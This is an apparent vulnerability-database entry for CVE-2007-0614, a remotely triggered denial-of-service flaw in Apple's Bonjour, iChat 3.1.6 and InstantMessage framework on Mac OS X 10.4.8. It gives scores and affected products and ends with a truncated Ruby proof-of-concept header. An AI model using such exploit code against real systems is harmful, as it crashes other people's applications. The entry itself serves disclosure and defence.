7.8
CVSSv2

CVE-2007-0614

Published: 31/01/2007 Updated: 05/09/2008
CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10
VMScore: 785
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

Vulnerability Summary

The Bonjour functionality in mDNSResponder, iChat 3.1.6, and InstantMessage framework 428 in Apple Mac OS X 10.4.8 allows remote malicious users to cause a denial of service (persistent application crash) via a crafted phsh hash attribute in a TXT key.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

apple instant message framework 428

apple ichat 3.1.6

apple mac os x 10.4.8

Exploits

#!/usr/bin/ruby # (c) 2006 Lance M Havok <lmh [at] info-pullcom> # All Rights Reserved # basic proof of concept for MOAB-29-01-2007 # require 'digest/sha1' require 'rubygems' require 'net/dns/mdns-sd' bugselected = (ARGV[0] || "0")to_i TMP_ARR = [] DNSSD = Net::DNS::MDNSSD trap("INT") { puts "++ Exiting" begin TMP_ ...